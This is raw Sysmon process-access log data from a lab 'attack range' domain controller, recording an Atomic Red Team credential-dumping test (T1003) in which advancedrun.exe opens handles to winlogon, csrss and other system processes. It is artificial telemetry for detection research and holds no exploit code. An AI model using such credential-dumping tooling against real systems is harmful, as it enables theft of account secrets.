17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952028Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952027Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952026Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952024Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952021Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952020Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952019Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952018Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952015Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003952014Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952013Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952011Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952010Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952009Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952008Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952007Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\